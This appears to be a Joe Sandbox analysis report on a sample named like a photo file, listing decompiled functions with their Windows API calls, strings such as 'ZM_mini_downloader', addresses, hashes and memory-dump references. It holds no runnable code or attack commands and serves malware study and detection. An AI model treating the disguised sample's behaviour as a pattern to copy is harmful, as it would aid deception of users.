                                                                Function 0040F85C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 96windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040F88D
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                  • Part of subcall function 00455B40: __CxxThrowException@8.LIBCMT ref: 00455D0C
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455D21
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455DBA
                                                                • PostMessageW.USER32(?,000007E9,00000000,00000000), ref: 0040F986
                                                                  • Part of subcall function 0040F7DA: GetLastError.KERNEL32 ref: 0040F7DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$ErrorException@8LastLongMessagePostThrowWindow
                                                                • String ID: complete$process$speed$total
                                                                • API String ID: 3288157659-3083368904
                                                                • Opcode ID: aefb50442911463e560eb52411737648296213f42fa0d4cd222f46c2b7da7db4
                                                                • Instruction ID: a6c323f2ccc5b429110c79cf795bac49c832045189db6c156442d907516369ad
                                                                • Opcode Fuzzy Hash: aefb50442911463e560eb52411737648296213f42fa0d4cd222f46c2b7da7db4
                                                                • Instruction Fuzzy Hash: 1A31B3716083459BC710DF25C891A6BF7E5FF84715F800A3EF85197291DB38E909CB96
                                                                Function 0045EEA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89threadsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 0045EECC
                                                                • WaitForSingleObject.KERNEL32(0048A159,005AD954,?,00468AC1,00000064,?,00000000,?,00000000,005995B1,000000FF,?,0045AA0A,?,?,00000000), ref: 0045EEEB
                                                                • TerminateThread.KERNEL32(0048A159,00000000,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,00480037), ref: 0045EFA9
                                                                  • Part of subcall function 00403203: __EH_prolog3.LIBCMT ref: 0040320A
                                                                • CloseHandle.KERNEL32(0048A159,?,00468AC1,00000064,?,00000000,?,00000000,005995B1,000000FF,?,0045AA0A,?,?,00000000), ref: 0045EFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Thread$CloseCurrentH_prolog3HandleObjectSingleTerminateWait
                                                                • String ID: CSimpleThread::DestroyThread$thread\SimpleThread.cpp
                                                                • API String ID: 2055454265-1333373511
                                                                • Opcode ID: a4873c2d950f5b52df714d1e06b3304e3291802f99d8a08cc36a33ee5a55ce02
                                                                • Instruction ID: 592c24ec82ab4fb0202f8aa7afbe428638884fed8bbf30d26dfe884830e04b42
                                                                • Opcode Fuzzy Hash: a4873c2d950f5b52df714d1e06b3304e3291802f99d8a08cc36a33ee5a55ce02
                                                                • Instruction Fuzzy Hash: 1431F2B1A40301BBD724DF65DD06B17BBE6EB08710F008A1EE926877C1DB79EA04DB94
                                                                Function 0041A6B6 Relevance: 10.6, APIs: 7, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClipBox.GDI32(?,00000000), ref: 0041A6FC
                                                                • CreateRectRgnIndirect.GDI32(00000000), ref: 0041A70C
                                                                • CreateRectRgnIndirect.GDI32(?), ref: 0041A715
                                                                • CreateRoundRectRgn.GDI32(?,?,?,?,?,?), ref: 0041A730
                                                                • CombineRgn.GDI32(?,?,?,00000001), ref: 0041A743
                                                                • ExtSelectClipRgn.GDI32(?,?,00000001), ref: 0041A752
                                                                • DeleteObject.GDI32(?), ref: 0041A767
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CreateRect$ClipIndirect$CombineDeleteObjectRoundSelect
                                                                • String ID:
                                                                • API String ID: 2381484079-0
                                                                • Opcode ID: c8a860a71de22f31cbd1794e6a4bd5dba3ffaf8e602e8b3a45b29ceaa4669d39
                                                                • Instruction ID: 2af5148aaf4847dc6301b7e79f6d6ebacacd057d531c71a275429d7198fca6a1
                                                                • Opcode Fuzzy Hash: c8a860a71de22f31cbd1794e6a4bd5dba3ffaf8e602e8b3a45b29ceaa4669d39
                                                                • Instruction Fuzzy Hash: C1218372900619AFDF01DFA8DD489EEBBBAFF09314F014416FD11BB210D671AA169FA1
                                                                Function 00406AD8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00406AE2
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 0044B530: PathFileExistsW.SHLWAPI(?,0040FDC4,00000001,00000000,00000000,?,type,?,00000002,game,?,ZM_mini_downloader,00000000,00000000,000000FF), ref: 0044B539
                                                                  • Part of subcall function 004014B3: __EH_prolog3.LIBCMT ref: 004014BA
                                                                  • Part of subcall function 004014B3: _wcslen.LIBCMT ref: 004014E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$ExistsFileH_prolog3H_prolog3_Path
                                                                • String ID: C:\$D:\$E:\$F:\$G:\
                                                                • API String ID: 3659348505-2884276237
                                                                • Opcode ID: fb6c450a4a9c6e83f2582f1290afa898c99308f62eca98a8f8cb19a21fc3095d
                                                                • Instruction ID: 88c7c4da24ccc19bef08df9719da5563ff036c9154578ddb79de2c7ddc41d489
                                                                • Opcode Fuzzy Hash: fb6c450a4a9c6e83f2582f1290afa898c99308f62eca98a8f8cb19a21fc3095d
                                                                • Instruction Fuzzy Hash: AB31A171904318DAEB10EB65CC82F8DBBF5AB04308F0140AFE509B7282D7BC6B458B66
                                                                Function 00414D9F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountFocusTick
                                                                • String ID: killfocus$setfocus
                                                                • API String ID: 3897604831-1991930995
                                                                • Opcode ID: 657cc97efdf1003f49759526bb6be74c310cbac9afec52e60a1cb242d940227c
                                                                • Instruction ID: ab7496b7adec756a1cdd3555812d9024aedeb109cf3349ceb021883d79b6621e
                                                                • Opcode Fuzzy Hash: 657cc97efdf1003f49759526bb6be74c310cbac9afec52e60a1cb242d940227c
                                                                • Instruction Fuzzy Hash: DA318F706007019FCB249F25C888A9BBBE6AFC5714F10896EE4868B790CBB8E844CF55
                                                                Function 00414D9E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CountFocusTick
                                                                • String ID: killfocus$setfocus
                                                                • API String ID: 3897604831-1991930995
                                                                • Opcode ID: 98d5efab8d257390c753cf7623df00b3e81178b520b7a5aedec712e7f12e4d45
                                                                • Instruction ID: 1d5f5eff4f42b1f25970a631c83d2185b5535dd0addc82a0585f65af5e172aea
                                                                • Opcode Fuzzy Hash: 98d5efab8d257390c753cf7623df00b3e81178b520b7a5aedec712e7f12e4d45
                                                                • Instruction Fuzzy Hash: F13180306047019FCB249F25C888A9FBBE5AFC5714F10896EE4868B791CBB9E845CF55
                                                                Function 00425408 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00425431
                                                                • CharNextW.USER32(?,?,00000000,?,?,004253FE,00000000,00423557), ref: 00425452
                                                                • _wcslen.LIBCMT ref: 00425472
                                                                • CharNextW.USER32(?,?,00000000,?,?,004253FE,00000000,00423557), ref: 00425485
                                                                • _wcslen.LIBCMT ref: 004254BA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CharNext
                                                                • String ID: W5B
                                                                • API String ID: 110608216-2890990381
                                                                • Opcode ID: 5ae70aec7f85e7c344c9e6b397d57e7eabb4e1fa31c196c9b93a3e731130df29
                                                                • Instruction ID: 28c44f6ba08f772c474fff18af1d08750ca705144af216568df43b020eb7cdc9
                                                                • Opcode Fuzzy Hash: 5ae70aec7f85e7c344c9e6b397d57e7eabb4e1fa31c196c9b93a3e731130df29
                                                                • Instruction Fuzzy Hash: 9721AE35200B109FCB28EF1CD580A7AF3B5EF84756791890EE88657651CB38B8A2CB18
                                                                Function 0048AD40 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • DecodePointer.KERNEL32(00000001,0048A397,0048A397,?,?,000000FF,?,0049611A,00000011,0048A397,?,00496970,0000000D), ref: 0048AD55
                                                                • DecodePointer.KERNEL32(?,?,000000FF,?,0049611A,00000011,0048A397,?,00496970,0000000D), ref: 0048AD62
                                                                • __realloc_crt.LIBCMT ref: 0048AD9F
                                                                • __realloc_crt.LIBCMT ref: 0048ADB5
                                                                • EncodePointer.KERNEL32(00000000,?,?,000000FF,?,0049611A,00000011,0048A397,?,00496970,0000000D), ref: 0048ADC7
                                                                • EncodePointer.KERNEL32(0048A397,?,?,000000FF,?,0049611A,00000011,0048A397,?,00496970,0000000D), ref: 0048ADDB
                                                                • EncodePointer.KERNEL32(-00000004,?,?,000000FF,?,0049611A,00000011,0048A397,?,00496970,0000000D), ref: 0048ADE3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Pointer$Encode$Decode__realloc_crt
                                                                • String ID:
                                                                • API String ID: 4108716018-0
                                                                • Opcode ID: 46bcaeddcca41dfa82a9e7f492565c0d249d5603d9719af8496add7f1d422156
                                                                • Instruction ID: c740dfcf47b710842e611a9fa866fc3a7e980b3875be0d12673b56f8b6284439
                                                                • Opcode Fuzzy Hash: 46bcaeddcca41dfa82a9e7f492565c0d249d5603d9719af8496add7f1d422156
                                                                • Instruction Fuzzy Hash: CB11D632600215AFEB10BF25DC8089E7BEFEB45361314583BF901D3610EAB9ED64DB94
                                                                Function 00423774 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateWindowExW.USER32(00080020,DyShadowWnd,DyShadowWnd,80880000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004237BE
                                                                • SetTimer.USER32(?,00000000,000003E8,0042382E), ref: 004237FA
                                                                • ShowWindow.USER32(?,00000000,?,00000000,00000000,?,00411D07,?,?,00000000,?,00000000,?,?,00000000), ref: 00423804
                                                                • GetWindowLongW.USER32(?,000000FC), ref: 0042380D
                                                                • SetWindowLongW.USER32(?,000000FC,00423859), ref: 0042381E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$CreateShowTimer
                                                                • String ID: DyShadowWnd
                                                                • API String ID: 2912781583-3303479959
                                                                • Opcode ID: a1a3c84d847d23d55e4119d26e061fde308ea75539b83c67aed4c9bceef1b65d
                                                                • Instruction ID: e4669de7fafaa3c2b4b7087b934bdc207f0e34b8ed0c56ff9250ac6d39fbaf37
                                                                • Opcode Fuzzy Hash: a1a3c84d847d23d55e4119d26e061fde308ea75539b83c67aed4c9bceef1b65d
                                                                • Instruction Fuzzy Hash: 7611D3B0200320BFC720AF66EC48D47BFFCEB96B61F208A1EF10692191D6749A04CB70
                                                                Function 004128FA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetPropW.USER32(?,WndX), ref: 00412918
                                                                • GetPropW.USER32(?,WndX), ref: 0041293E
                                                                • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 0041295F
                                                                • SetPropW.USER32(?,WndX,00000000), ref: 00412977
                                                                • DefWindowProcW.USER32(?,00000081,?,?), ref: 00412998
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Prop$ProcWindow$Call
                                                                • String ID: WndX
                                                                • API String ID: 1029653574-1375107400
                                                                • Opcode ID: a8941c4ded41e7d29f86f40c01ba6db7cbe72947b42c166515600e5a248fbbab
                                                                • Instruction ID: 8030781524ebafa9864dc422e0c6b66655d1ec5d0331f9e6e774cc459ad46915
                                                                • Opcode Fuzzy Hash: a8941c4ded41e7d29f86f40c01ba6db7cbe72947b42c166515600e5a248fbbab
                                                                • Instruction Fuzzy Hash: 5B2147B1200209EFCF219F55DE48E9B7BB9EF09720F00841AF886A7661C7B59C60DF65
                                                                Function 004127B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 004127C9
                                                                • GetClassInfoExW.USER32(00000000,00000000), ref: 004127EC
                                                                • GetClassInfoExW.USER32(00000000,00000000), ref: 00412805
                                                                • RegisterClassExW.USER32(00000030), ref: 00412832
                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 0041283D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$ErrorLastRegister_memset
                                                                • String ID: 0
                                                                • API String ID: 3690237952-4108050209
                                                                • Opcode ID: c7fe6544274b277a75ca8413f464f08ba2844ae04407f94e6a29ad0a16500bdd
                                                                • Instruction ID: 638840f38c62a8e67963b2eef7e5561f7d3d4b798ad1ef2156d390698a249fc9
                                                                • Opcode Fuzzy Hash: c7fe6544274b277a75ca8413f464f08ba2844ae04407f94e6a29ad0a16500bdd
                                                                • Instruction Fuzzy Hash: BE113D75A10209AFDB00EFA8DC48EAEB7F8FF58344F10451AE902E3251D7B4E9458BA5
                                                                Function 0041E67E Relevance: 10.5, APIs: 7, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
